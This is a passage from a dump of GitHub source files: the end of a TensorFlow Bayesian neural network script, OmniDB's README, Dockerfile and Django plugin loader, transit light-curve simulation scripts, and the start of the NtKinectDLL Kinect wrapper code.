tf.sqrt(tf.reduce_mean(tf.square(tf.subtract(self.Y_train, predictions_training))))\r\n\t\ttrain_op = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\r\n\t\tself.sess.run(tf.initialize_all_variables())\r\n\r\n\t\tfor i in range(10000):\r\n\r\n\t\t\tself.sess.run(train_op,feed_dict={self.X_train:X_train,self.Y_train:Y_train})\r\n\t\t\t\r\n\t\t\tprint self.sess.run(tf.reduce_mean(tf.square(tf.subtract(self.Y_train, predictions_training))),feed_dict={self.Y_train:Y_train,self.X_train:X_train} )\r\n\r\n\r\n\r\nif __name__ 
== '__main__':\r\n\r\n\r\n\tx_train = np.linspace(0.0,1.0,500)\r\n\tx_train = np.reshape(x_train,(500,1))\r\n\ty_train = x_train + 0.3 * np.sin(2.0 * np.pi * (x_train + np.random.normal(size=(500,1)))) + 0.3 * np.sin( 4.0 * np.pi * (x_train + np.random.normal(size=(500,1))))\r\n\r\n\t\r\n\ty_train = np.reshape(y_train,(500,1))\r\n\r\n\tBNN = Bayesian_Neural_Network(num_data=500,num_test=1000,num_minibatch=10,dim_layers=[1,10,10,1],dim_input=1,dim_output=1,num_hidden_layers=2)\r\n\tBNN.session_TF(X_train = x_train,Y_train = y_train)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
}
] | 1 |
zsozsoGit/OmniDB_
|
https://github.com/zsozsoGit/OmniDB_
|
090bc2613fccc7504ff3749eddb5e4f8982c6c14
|
566e3ea38ea80cf2554442e098b438aab47b59e3
|
06a54d785b1eff1193d1eea36f235022266d4fac
|
refs/heads/master
| 2020-04-19T17:17:26.354898 | 2019-01-30T16:15:23 | 2019-01-30T16:15:23 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7343694567680359,
"alphanum_fraction": 0.7467325925827026,
"avg_line_length": 32.11111068725586,
"blob_id": "da22bd9519ca1fe241fd5b40d88183bb81b254a0",
"content_id": "c5e91ef043005bee00c755ca04a999b0cf00d694",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5662,
"license_type": "permissive",
"max_line_length": 162,
"num_lines": 171,
"path": "/README.md",
"repo_name": "zsozsoGit/OmniDB_",
"src_encoding": "UTF-8",
"text": "## Next Release: *2.14.0 - February 14, 2019*\n\n# OmniDB 2.13.0\n\n## Release Date: *December 20, 2018*\n\n## Release Notes\n\n- New features:\n - Connection Groups: allow users to, for example, easily distinct Production and Test database servers\n - User and connection management via omnidb-config CLI utility, which helps with automated deploying\n- Improvements:\n - Advanced Object Search now considers view and materialized view definition\n - Show trigger function when expanding the trigger node in the tree view\n - PostgreSQL: Improved \\h command, which provides syntax help on SQL commands\n - Linux: OmniDB systemd service now uses configuration file in /etc/omnidb.conf\n - Converted all OmniDB users passwords into hashes in the OmniDB user database, improving security\n - OmniDB upgrade procedure now takes a backup of the user database (file omnidb.db)\n - Autocommit is now always enabled on Oracle/MySQL/MariaDB\n - User won't need to execute query again after password expiration / re-validation\n - OmniDB debugger plugin for PostgreSQL 11 for FreeBSD\n- Bug fixes:\n - Fixed: Click index with WHERE clause: \"Can only transpose a table with a single row\"\n - Fixed: Export to XLSX/CSV does not consider all rows\n - Fixed: Error closing error window\n - Fixed: Monitoring Dashboard: Column widths are not adjusted when the monitoring tab doesn't have focus\n - Fixed: User Mapping is not being shown in the tree if there are no options\n - Fixed: Foreign Table DDL not being shown correctly if there are no options\n - Fixed: DDL for functions and procedures do not show a necessary comma after function body\n\n\n# 1- Installation\n\n## 1.1- Installation packages\n\nJust go to [omnidb.org](https://omnidb.org), download the appropriate file for your\noperating system and architecture and install it.\n\n## 1.2- From source\n\n### 1.2.1- On Debian >= 9 with `pip`\n\n```\nsudo apt install python3-pip\npip3 install pip --upgrade\npip3 install -r requirements.txt\n```\n\n### 1.2.2- On Debian/Ubuntu using `PyEnv`\n\n```\nsudo apt install git make build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-utils\n\ngit clone https://github.com/pyenv/pyenv.git ~/.pyenv\necho 'export PYENV_ROOT=\"$HOME/.pyenv\"' >> ~/.bashrc\necho 'export PATH=\"$PYENV_ROOT/bin:$PATH\"' >> ~/.bashrc\necho 'eval \"$(pyenv init -)\"' >> ~/.bashrc\nsource ~/.bashrc\n\npyenv install 3.5.2\ncd OMNIDB_FOLDER\npyenv local 3.5.2\n\npip install pip --upgrade\npip install -r requirements.txt\n```\n\n## 1.3- Running OmniDB\n\nDownload or clone OmniDB repo and extract it somewhere. To start Django server, enter into `OmniDB/OmniDB` folder and type:\n\n```\npython omnidb-server.py\n```\n\n# 2- Introduction\n\n**OmniDB** is a web tool that simplifies database management focusing on interactivity, designed to be powerful and lightweight. 
Check-out some characteristics:\n\n- **Web Tool**: Accessible from any platform, using a browser as a medium\n- **Responsive Interface**: All available functions in a single page\n- **Unified Workspace**: Different technologies managed in a single workspace\n- **Simplified Editing**: Easy to add and remove connections\n- **Safety**: Multi-user support with encrypted personal information\n- **Interactive Tables**: All functionalities use interactive tables, allowing copying and pasting in blocks\n- **Smart SQL Editor**: Contextual SQL code completion\n- **Beautiful SQL Editor**: You can choose between many available color themes\n- **Tabbed SQL Editor**: Easily add, rename or delete editor tabs\n\n\n\nTechnologies:\n\n- Python (3.5+)\n- Django\n\nSupported Platforms:\n\n- Linux\n- Windows\n- OS X\n\nSupported DBMS:\n\n- [X] PostgreSQL\n- [X] Oracle\n- [X] MySQL / MariaDB\n- [ ] Firebird\n- [ ] SQLite\n- [ ] Microsoft SQL Server\n- [ ] IBM DB2\n\n# 3- Database Schema Management\n\nOmniDB is designed for easy database management. Here are some features:\n\n- Tree view showing database structure\n\n\n\n- Powerful table creation\n - Editing capabilities:\n - Tables' names\n - Columns: name, type and nullable\n - Primary keys and respective columns\n - Foreign keys with either table and reference columns, including updating rules and removal as well\n - Indexes\n\n\n\n- Table editing: Edit table structure according to DBMS limitations\n- Data management: Add, edit and remove records\n\n\n\n- SQL Editing\n - Syntax highlighting for SQL\n - SQL code completion for table columns and subquery\n - Multiple themes to be selected\n\n\n\n- Support for external tools:\n - [pglogical](https://www.2ndquadrant.com/en/resources/pglogical/)\n - [Postgres-BDR](https://www.2ndquadrant.com/en/resources/bdr/)\n - [Postgres-XL](https://www.2ndquadrant.com/en/resources/postgres-xl/)\n\n\n- Other features:\n - Querying organized in tables\n - DDL commands execution\n - SQL history\n - Graphs displaying tables and their relations\n\n\n\n - Graphs displaying complete ER diagram\n\n\n\n - Visualization of explain plan\n\n\n\n - PL/pgSQL function debugger (requires a plugin, please see [here](https://github.com/OmniDB/OmniDB/blob/master/omnidb_plugin/README.md))\n\n\n\n - Monitoring dashboard\n\n\n"
},
{
"alpha_fraction": 0.6068965792655945,
"alphanum_fraction": 0.6689655184745789,
"avg_line_length": 21.894737243652344,
"blob_id": "15fbafb63e6b6ed026e542db5a4c44d7cc29053e",
"content_id": "a1aeb90c8eb6ae25dec9eaf3a0934063e994ac4e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 435,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 19,
"path": "/Dockerfile",
"repo_name": "zsozsoGit/OmniDB_",
"src_encoding": "UTF-8",
"text": "FROM debian:stable-slim\n\nRUN apt-get update \\\n && apt-get -y upgrade \\\n && apt-get install -y systemd \\\n && apt-get install -y wget \\\n && rm -rf /var/lib/apt/lists/*\n\nRUN mkdir /app\nWORKDIR /app\n\nRUN wget -q https://omnidb.org/dist/2.5.0/omnidb-server_2.5.0-debian-amd64.deb \\\n && dpkg -i /app/omnidb-server_2.5.0-debian-amd64.deb \\\n && rm -rf omnidb-server_2.5.0-debian-amd64.deb\n\nEXPOSE 8000\nEXPOSE 25482\n\nCMD [\"omnidb-server\"]\n"
},
{
"alpha_fraction": 0.5676797032356262,
"alphanum_fraction": 0.5698104500770569,
"avg_line_length": 36.46638488769531,
"blob_id": "33e24c62ae3de8baa2a7f8ae637f24b8694abcb1",
"content_id": "60373fa4091d77e83f9600233bab90de7964c2d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8917,
"license_type": "permissive",
"max_line_length": 158,
"num_lines": 238,
"path": "/OmniDB/OmniDB_app/views/plugins.py",
"repo_name": "zsozsoGit/OmniDB_",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\nfrom django.template import loader\nfrom django.http import JsonResponse\nfrom django.core import serializers\nfrom django.shortcuts import redirect\nfrom datetime import datetime\nfrom math import ceil\nimport json\nfrom os import listdir\nfrom os.path import isfile, join, isdir\nfrom OmniDB import settings\nimport importlib\nfrom configparser import ConfigParser\nfrom itertools import chain\n\nimport OmniDB_app.include.OmniDatabase as OmniDatabase\n\n#loading python plugins\nplugins = {}\nplugins_folders = listdir(settings.PLUGINS_DIR)\n\ndef load_plugins():\n for plugin_folder in plugins_folders:\n plugin_name = ''\n plugin_version = ''\n enabled = True\n if isfile(join(settings.PLUGINS_DIR,plugin_folder,'plugin.conf')):\n conf_exists = True\n else:\n conf_exists = False\n enabled = False\n if isfile(join(settings.PLUGINS_STATIC_DIR,plugin_folder,'plugin.js')):\n js_exists = True\n else:\n js_exists = False\n enabled = False\n if isfile(join(settings.PLUGINS_DIR,plugin_folder,'plugin.py')):\n py_exists = True\n else:\n py_exists = False\n enabled = False\n if isfile(join(settings.PLUGINS_STATIC_DIR,plugin_folder,'plugin.css')):\n css_exists = True\n else:\n css_exists = False\n #if is directory, try to import plugin.py inside it\n if isdir(join(settings.PLUGINS_DIR,plugin_folder)):\n try:\n parser = ConfigParser()\n with open(join(settings.PLUGINS_DIR,plugin_folder,'plugin.conf')) as lines:\n lines = chain((\"[top]\",), lines)\n parser.read_file(lines)\n plugin_name = parser.get('top', 'name')\n plugin_version = parser.get('top', 'version')\n\n plugins[plugin_name] = {\n 'module' : importlib.import_module('OmniDB_app.plugins.{0}.plugin'.format(plugin_folder)),\n 'folder' : plugin_folder,\n 'name' : plugin_name,\n 'version' : plugin_version,\n 'conf_exists' : conf_exists,\n 'js_exists' : js_exists,\n 'py_exists' : py_exists,\n 'css_exists' : css_exists,\n 'enabled' : enabled,\n 'javascript_file': '/static/plugins/{0}/plugin.js'.format(plugin_folder),\n 'css_file' : '/static/plugins/{0}/plugin.css'.format(plugin_folder) if css_exists else '',\n 'plugin_folder' : '/static/plugins/{0}/'.format(plugin_folder)\n }\n print('Loaded plugin {0}.'.format(plugin_name),flush=True)\n except Exception as exc:\n print('Failed to load plugin {0}: {1}.'.format(plugin_name, str(exc)),flush=True)\n plugins[plugin_name] = {\n 'module' : None,\n 'folder' : plugin_folder,\n 'name' : plugin_name,\n 'version' : plugin_version,\n 'conf_exists' : conf_exists,\n 'js_exists' : js_exists,\n 'py_exists' : py_exists,\n 'css_exists' : css_exists,\n 'enabled' : enabled,\n 'javascript_file': '/static/plugins/{0}/plugin.js'.format(plugin_folder),\n 'css_file' : '/static/plugins/{0}/plugin.css'.format(plugin_folder) if css_exists else '',\n 'plugin_folder' : '/static/plugins/{0}/'.format(plugin_folder)\n }\n\nload_plugins()\n\n#reloading plugins\ndef reload_plugins(request):\n\n v_return = {}\n v_return['v_data'] = ''\n v_return['v_error'] = False\n v_return['v_error_id'] = -1\n\n #Invalid session\n if not request.session.get('omnidb_session'):\n v_return['v_error'] = True\n v_return['v_error_id'] = 1\n return JsonResponse(v_return)\n\n v_session = request.session.get('omnidb_session')\n\n load_plugins()\n\n v_return['v_data'] = True\n\n return JsonResponse(v_return)\n\n#loading javascript plugins\ndef get_plugins(request):\n\n v_return = {}\n v_return['v_data'] = ''\n v_return['v_error'] = False\n v_return['v_error_id'] = -1\n\n #Invalid session\n if not 
request.session.get('omnidb_session'):\n v_return['v_error'] = True\n v_return['v_error_id'] = 1\n return JsonResponse(v_return)\n\n v_session = request.session.get('omnidb_session')\n\n json_object = json.loads(request.POST.get('data', None))\n plugin_list = []\n for key, plugin in plugins.items():\n if plugin['enabled']:\n plugin_list.append({ 'name': plugin['name'], 'file': plugin['javascript_file'], 'cssfile': plugin['css_file'], 'folder': plugin['plugin_folder']})\n\n v_return['v_data'] = plugin_list\n\n return JsonResponse(v_return)\n\n#loading javascript plugins\ndef list_plugins(request):\n\n v_return = {}\n v_return['v_data'] = ''\n v_return['v_error'] = False\n v_return['v_error_id'] = -1\n\n #Invalid session\n if not request.session.get('omnidb_session'):\n v_return['v_error'] = True\n v_return['v_error_id'] = 1\n return JsonResponse(v_return)\n\n v_session = request.session.get('omnidb_session')\n\n json_object = json.loads(request.POST.get('data', None))\n plugin_list = []\n for key, plugin in plugins.items():\n if plugin['conf_exists']:\n conf_html = '<i class=\"fas fa-check-circle action-grid action-check\"></i>'\n else:\n conf_html = '<i class=\"fas fa-times action-grid action-close\"></i>'\n if plugin['js_exists']:\n js_html = '<i class=\"fas fa-check-circle action-grid action-check\"></i>'\n else:\n js_html = '<i class=\"fas fa-times action-grid action-close\"></i>'\n if plugin['py_exists']:\n py_html = '<i class=\"fas fa-check-circle action-grid action-check\"></i>'\n else:\n py_html = '<i class=\"fas fa-times action-grid action-close\"></i>'\n if plugin['css_exists']:\n css_html = '<i class=\"fas fa-check-circle action-grid action-check\"></i>'\n else:\n css_html = '<i class=\"fas fa-times action-grid action-close\"></i>'\n if plugin['enabled']:\n plugin_enabled = '<i class=\"fas fa-check-circle action-grid action-check\"></i>'\n else:\n plugin_enabled = '<i class=\"fas fa-times action-grid action-close\"></i>'\n\n plugin_list.append([plugin['folder'],plugin['name'],plugin['version'],conf_html,js_html,py_html,css_html,plugin_enabled])\n\n v_return['v_data'] = plugin_list\n\n return JsonResponse(v_return)\n\ndef exec_plugin_function(request):\n\n v_return = {}\n v_return['v_data'] = ''\n v_return['v_error'] = False\n v_return['v_error_id'] = -1\n\n #Invalid session\n if not request.session.get('omnidb_session'):\n v_return['v_error'] = True\n v_return['v_error_id'] = 1\n return JsonResponse(v_return)\n\n v_session = request.session.get('omnidb_session')\n\n json_object = json.loads(request.POST.get('data', None))\n p_plugin_name = json_object['p_plugin_name']\n p_function_name = json_object['p_function_name']\n p_data = json_object['p_data']\n p_check_database_connection = json_object['p_check_database_connection']\n p_database_index = json_object['p_database_index']\n p_tab_id = json_object['p_tab_id']\n\n try:\n v_database_orig = v_session.v_tab_connections[p_tab_id]\n v_database = OmniDatabase.Generic.InstantiateDatabase(\n v_database_orig.v_db_type,\n v_database_orig.v_connection.v_host,\n str(v_database_orig.v_connection.v_port),\n v_database_orig.v_service,\n v_database_orig.v_user,\n v_database_orig.v_connection.v_password,\n v_database_orig.v_conn_id,\n v_database_orig.v_alias,\n 'OmniDB / {0}'.format(p_plugin_name)\n )\n except:\n v_database = None\n\n #Check database prompt timeout\n if p_check_database_connection and p_database_index:\n v_timeout = v_session.DatabaseReachPasswordTimeout(int(p_database_index))\n if v_timeout['timeout']:\n v_return['v_data'] = 
{'password_timeout': True, 'message': v_timeout['message'] }\n v_return['v_error'] = True\n return JsonResponse(v_return)\n\n try:\n v_return['v_data'] = getattr(plugins[p_plugin_name]['module'], p_function_name)(v_database,p_data)\n except Exception as exc:\n v_return['v_data'] = {'password_timeout': True, 'message': str(exc) }\n v_return['v_error'] = True\n return JsonResponse(v_return)\n\n return JsonResponse(v_return)\n"
},
{
"alpha_fraction": 0.6532663106918335,
"alphanum_fraction": 0.7185929417610168,
"avg_line_length": 18.899999618530273,
"blob_id": "dbbb4bcda3eabfb5bddb029ffc9e2ffe85568fd4",
"content_id": "b51a909f1dfae27f1b12c4c9c0252199f4576cae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 199,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 10,
"path": "/OmniDB/OmniDB/custom_settings.py",
"repo_name": "zsozsoGit/OmniDB_",
"src_encoding": "UTF-8",
"text": "import os\n\nOMNIDB_VERSION = 'OmniDB 2.13.0'\nOMNIDB_SHORT_VERSION = '2.13.0'\nDEV_MODE = True\nDESKTOP_MODE = False\nHOME_DIR = None\nAPP_TOKEN = None\nPWD_TIMEOUT_TOTAL = 1800\nTHREAD_POOL_MAX_WORKERS = 2\n"
}
] | 4 |
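The plugin loader in plugins.py above expects each folder under settings.PLUGINS_DIR to carry a plugin.conf (bare key=value lines, parsed by load_plugins() under a synthetic [top] section) and a plugin.py whose functions exec_plugin_function() dispatches by name with a database handle and the browser payload; a plugin.js under PLUGINS_STATIC_DIR is also required for the plugin to count as enabled. A minimal sketch of such a plugin.py; the folder name hello_world and the echo function are hypothetical:

# OmniDB_app/plugins/hello_world/plugin.py -- hypothetical minimal plugin.
# The companion plugin.conf in the same folder holds bare key=value lines:
#   name=Hello World
#   version=1.0.0
# A plugin.js must also exist under PLUGINS_STATIC_DIR/hello_world/;
# plugin.css is optional.

def echo(database, data):
    # exec_plugin_function() invokes getattr(module, p_function_name)(v_database, p_data):
    # 'database' is the OmniDatabase connection built for the calling tab
    # (None if instantiation failed), 'data' is the JSON payload from the browser.
    return {'received': data, 'has_connection': database is not None}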
nespinoza/BayesianDetectionST | https://github.com/nespinoza/BayesianDetectionST | 539f7ae94b91e7ecba68380df9b91952b2e99f7e | 272f266cc9925b1082b5ff4dffff68eac3278004 | 0964287f5e8d4cdc45137b5319fc0eeec2f363f4 | refs/heads/master | 2022-12-26T16:38:26.722960 | 2020-10-11T22:36:51 | 2020-10-11T22:36:51 | 303,217,942 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6391128897666931,
"alphanum_fraction": 0.6532257795333862,
"avg_line_length": 40.33333206176758,
"blob_id": "2c685d89605e9ff84ad7e3e9a41b76bdbb7a7d33",
"content_id": "39786bf88d2f76a33c18029894aebea0464f65a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 496,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 12,
"path": "/run_no_transit.py",
"repo_name": "nespinoza/BayesianDetectionST",
"src_encoding": "UTF-8",
"text": "import juliet\nimport numpy as np\nimport glob\n\nfolders = glob.glob('sim_*')\nfor folder in folders:\n files = glob.glob(folder+'/noisy_model*')\n for lcfile in files:\n print(lcfile)\n f = lcfile.split('/')[-1].split('.dat')[0]\n dataset = juliet.load(priors='priors_no_transit.dat', lcfilename=lcfile, out_folder = folder+'/'+f+'_results-no-transit', verbose = True)\n results = dataset.fit(use_dynesty=True, dynamic = True, dynesty_nthreads = 6, n_live_points = 1000)\n"
},
{
"alpha_fraction": 0.5477213859558105,
"alphanum_fraction": 0.6040412783622742,
"avg_line_length": 40.53571319580078,
"blob_id": "ac2430ba7c6c57fc6acd3f8fc9b0a646ecf0bba6",
"content_id": "8842fa5004a3750a09325f08c852cd5841aedbbe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2326,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 56,
"path": "/generate_lcs.py",
"repo_name": "nespinoza/BayesianDetectionST",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport batman\n\nP, a, inc, ecc, omega = 34.75, 16.49, 88.39, 0., 90.\ntimes = np.linspace(0.,27,19440)\ndef transit_model(times, rp):\n params = batman.TransitParams()\n params.t0 = 13.5 # time of inferior conjunction\n params.per = P # orbital period (days)\n params.a = a # semi-major axis (in units of stellar radii)\n params.rp = rp # planet/star radius ratio\n params.inc = inc # orbital inclination (in degrees)\n params.ecc = ecc # eccentricity\n params.w = omega # longitude of periastron (in degrees) p\n params.limb_dark = 'quadratic' # limb darkening profile to use\n coeff1,coeff2 = 0.42767669222857835, 0.32963466956391446\n params.u = [coeff1, coeff2] # limb darkening coefficients\n\n tmodel = batman.TransitModel(params, times.astype('float64'))\n return tmodel.light_curve(params)\n\ndef save_data(folder,fname,index,t,f,precision):\n fout = open(folder+'/'+fname+'_'+str(index)+'.dat','w')\n for i in range(len(t)):\n fout.write('{0:.10f} {1:.10f} {2:.10f} TESS\\n'.format(t[i],f[i],precision*1e-6))\n\n# Number of simulations per bin:\nnsim = 5\n# Precisions:\nsigmas = np.logspace(np.log10(300),np.log10(1000),5)\n# Depths:\ndepths = np.logspace(np.log10(100),np.log10(1000),5)\n# Cuts\nndata_cuts = np.linspace(1,10,5).astype('int')\n\n# Generate datasets:\nfor sigma in sigmas:\n for depth in depths:\n for ndata_cut in ndata_cuts:\n folder_name = 'sim_'+str(ndata_cut)+'_'+str(int(sigma))+'_'+str(int(depth))\n os.mkdir(folder_name)\n for i in range(nsim):\n new_times = np.copy(times)\n if ndata_cut == 1:\n model = transit_model(times,np.sqrt(depth*1e-6))\n else:\n ndata = len(times)/np.double(ndata_cut)\n left_ndata = int(19440./2.) - int(ndata/2.)\n right_ndata = int(19440./2.) + int(ndata/2.)\n new_times = np.copy(times[left_ndata:right_ndata])\n model = transit_model(new_times,np.sqrt(depth*1e-6))\n noise = np.random.normal(0.,sigma*1e-6,len(new_times))\n data = model + noise\n save_data(folder_name,'real_model',i,new_times,model,sigma)\n save_data(folder_name,'noisy_model',i,new_times,data,sigma)\n"
},
{
"alpha_fraction": 0.6548856496810913,
"alphanum_fraction": 0.7110186815261841,
"avg_line_length": 119.25,
"blob_id": "8756bd1afaa17fd77743a0d65e3c78325f22eba8",
"content_id": "eaf12df44f4d875572672e7cbbf40ebc4995fd4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 403,
"num_lines": 4,
"path": "/README.md",
"repo_name": "nespinoza/BayesianDetectionST",
"src_encoding": "UTF-8",
"text": "Bayesian Detection of Single Transits\n-------------------------------------\n\nThe `generate_lcs.py` code generates file of the form `sim_10_1000_100`. First number is by how much the original dataset has been trimmed (in this case, 10 is a factor of 10 --- if you had 1000 datapoints, this covers only the central 100 datapoints). Next is the lightcurve precision (1000 ppm in this case); and final number is the transit depth of the injected transit in ppm (100 ppm in this case).\n"
}
] | 3 |
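The README above spells out the sim_* naming convention written by generate_lcs.py. A short helper to decode those folder names; parse_sim_folder is an illustrative name, not part of the repository:

# Decode folder names produced by generate_lcs.py, e.g. 'sim_10_1000_100'.
def parse_sim_folder(name):
    _, ndata_cut, sigma, depth = name.split('_')
    return {'trim_factor': int(ndata_cut),  # keep the central 1/N of the 19440 points
            'precision_ppm': int(sigma),    # Gaussian noise sigma in ppm
            'depth_ppm': int(depth)}        # injected transit depth in ppm

print(parse_sim_folder('sim_10_1000_100'))
# -> {'trim_factor': 10, 'precision_ppm': 1000, 'depth_ppm': 100}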
YoshihisaNitta/NtKinectDLL | https://github.com/YoshihisaNitta/NtKinectDLL | 8d1cf0a2acf0d78495cac9548af1c8f313afd0b9 | 073186673b6ee47f55d5060594b76b04d12a2906 | 99b5a4a4f6b97bba6b06a9c86250b72fde3fcf07 | refs/heads/master | 2022-02-18T09:10:18.354181 | 2019-08-31T13:29:05 | 2019-08-31T13:29:05 | 115,174,756 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6808342337608337,
"alphanum_fraction": 0.6874340176582336,
"avg_line_length": 35.880001068115234,
"blob_id": "b6b95945bc72ed75e5a29557a061f5bba719d56d",
"content_id": "9230dc14d418061ff058e961605f53cc1cd05824",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3788,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 100,
"path": "/NtKinectDLL.h",
"repo_name": "YoshihisaNitta/NtKinectDLL",
"src_encoding": "UTF-8",
"text": "/*\r\n* Copyright (c) 2017 Yoshihisa Nitta\r\n* Released under the MIT license\r\n* http://opensource.org/licenses/mit-license.php\r\n*/\r\n\r\n/*\r\n* NtKinectDLL.h version 1.2.6: 2017/11/08\r\n* http://nw.tsuda.ac.jp/lec/kinect2/NtKinectDLL\r\n*\r\n* requires:\r\n* NtKinect version 1.8.2 and later\r\n*/\r\n\r\n#ifdef NTKINECTDLL_EXPORTS\r\n#define NTKINECTDLL_API __declspec(dllexport)\r\n#else\r\n#define NTKINECTDLL_API __declspec(dllimport)\r\n#endif\r\n\r\nnamespace NtKinectDLL {\r\n extern \"C\" {\r\n NTKINECTDLL_API void* getKinect(void);\r\n NTKINECTDLL_API void stopKinect(void* ptr);\r\n\r\n // OpenCV\r\n NTKINECTDLL_API void imshow(void* ptr);\r\n NTKINECTDLL_API void imshowBlack(void* ptr);\r\n\r\n // CoordinateMapper\r\n /*\r\n NTKINECTDLL_API void mapCameraPointToColorSpace(void* ptr,void* sv,void* cv);\r\n NTKINECTDLL_API void mapCameraPointToDepthSpace(void* ptr,void* sv,void* dv);\r\n NTKINECTDLL_API void mapDepthPointToColorSpace(void* ptr,void* dv,UINT16 depth,void* cv);\r\n NTKINECTDLL_API void mapDepthPointToCameraSpace(void* ptr,void* dv,UINT16 depth,void* sv);\r\n */\r\n NTKINECTDLL_API void mapCameraPointToColorSpace(void* ptr, void* sv, void* cv, int n);\r\n NTKINECTDLL_API void mapCameraPointToDepthSpace(void* ptr, void* sv, void* dv, int n);\r\n NTKINECTDLL_API void mapDepthPointToColorSpace(void* ptr, void* dv, void* dth, void* cv, int n);\r\n NTKINECTDLL_API void mapDepthPointToCameraSpace(void* ptr, void* dv, void* dth, void* sv, int n);\r\n\r\n // Multi Thread\r\n NTKINECTDLL_API void acquire(void* ptr);\r\n NTKINECTDLL_API void release(void* ptr);\r\n\r\n // Audio\r\n NTKINECTDLL_API void setAudio(void* ptr, bool flag);\r\n NTKINECTDLL_API float getBeamAngle(void* ptr);\r\n NTKINECTDLL_API float getBeamAngleConfidence(void* ptr);\r\n NTKINECTDLL_API unsigned __int64 getAudioTrackingId(void* ptr);\r\n NTKINECTDLL_API void openAudio(void* ptr, wchar_t* filename);\r\n NTKINECTDLL_API void closeAudio(void* ptr);\r\n NTKINECTDLL_API bool isOpenedAudio(void* ptr);\r\n\r\n // RGB\r\n NTKINECTDLL_API void setRGB(void* ptr);\r\n NTKINECTDLL_API int getRGB(void* ptr, void* data);\r\n\r\n // Depth\r\n NTKINECTDLL_API void setDepth(void* ptr);\r\n NTKINECTDLL_API int getDepth(void* ptr, void* data);\r\n\r\n // Infrared\r\n NTKINECTDLL_API void setInfrared(void* ptr);\r\n NTKINECTDLL_API int getInfrared(void* ptr, void* data);\r\n\r\n // BodyIndex\r\n NTKINECTDLL_API void setBodyIndex(void* ptr);\r\n NTKINECTDLL_API int getBodyIndex(void* ptr, void* data);\r\n\r\n // Skeleton\r\n NTKINECTDLL_API void setSkeleton(void* ptr);\r\n NTKINECTDLL_API int getSkeleton(void* ptr, void* skelton, void* state, void* id, void* tid);\r\n NTKINECTDLL_API int handState(void* ptr, int id, bool isLeft);\r\n\r\n // Face\r\n NTKINECTDLL_API void setFace(void* ptr, bool flag);\r\n NTKINECTDLL_API int getFace(void* ptr, float* point, float* rect, float* direction, int* property, void* tid);\r\n\r\n // HDFace\r\n NTKINECTDLL_API void setHDFace(void* ptr);\r\n NTKINECTDLL_API int getHDFace(void* ptr, float* point, void* tid, int *status);\r\n\r\n // Gesture\r\n NTKINECTDLL_API void setGestureFile(void* ptr, wchar_t* filename);\r\n NTKINECTDLL_API int setGestureId(void* ptr, wchar_t* name, int id); // id: non-zero\r\n NTKINECTDLL_API void setGesture(void* ptr);\r\n NTKINECTDLL_API int getDiscreteGesture(void* ptr, int* gid, float* confidence, void* tid);\r\n NTKINECTDLL_API int getContinuousGesture(void* ptr, int* gid, float* progress, void* tid);\r\n NTKINECTDLL_API int 
getGidMapSize();\r\n\r\n // Video\r\n NTKINECTDLL_API void openVideo(void* ptr, wchar_t* filename);\r\n NTKINECTDLL_API void writeVideo(void* ptr);\r\n NTKINECTDLL_API void closeVideo(void* ptr);\r\n }\r\n\r\n //Gesture\r\n std::unordered_map<std::string, int> gidMap;\r\n}\r\n"
},
{
"alpha_fraction": 0.5776862502098083,
"alphanum_fraction": 0.5907275676727295,
"avg_line_length": 34.672767639160156,
"blob_id": "5b097c689bf9eb25f0adda29ba451755b6d2aa12",
"content_id": "1168011d75344085f7032d1a82892b00da22fa62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 16028,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 437,
"path": "/VS2019_CV411/NtKinectDLL/NtKinectDLL/NtKinectDLL.cpp",
"repo_name": "YoshihisaNitta/NtKinectDLL",
"src_encoding": "UTF-8",
"text": "/*\r\n * Copyright (c) 2017 Yoshihisa Nitta\r\n * Released under the MIT license\r\n * http://opensource.org/licenses/mit-license.php\r\n */\r\n\r\n/*\r\n * NtKinectDLL.h version 1.2.6: 2017/11/08\r\n * http://nw.tsuda.ac.jp/lec/kinect2/NtKinectDLL\r\n *\r\n * requires:\r\n * NtKinect version 1.8.2 and after\r\n */\r\n\r\n#include \"pch.h\"\r\n#include \"framework.h\"\r\n\r\n#include <unordered_map>\r\n#include \"NtKinectDLL.h\"\r\n\r\n#define USE_AUDIO\r\n#define USE_FACE\r\n#define USE_GESTURE\r\n#define USE_THREAD\r\n#include \"NtKinect.h\"\r\n\r\nusing namespace std;\r\n\r\nnamespace NtKinectDLL {\r\n string wchar2string(wchar_t* name) {\r\n int len = WideCharToMultiByte(CP_UTF8, NULL, name, -1, NULL, 0, NULL, NULL) + 1;\r\n char* nameBuffer = new char[len];\r\n memset(nameBuffer, '\\0', len);\r\n WideCharToMultiByte(CP_UTF8, NULL, name, -1, nameBuffer, len, NULL, NULL);\r\n string s(nameBuffer);\r\n return s;\r\n }\r\n\r\n NTKINECTDLL_API 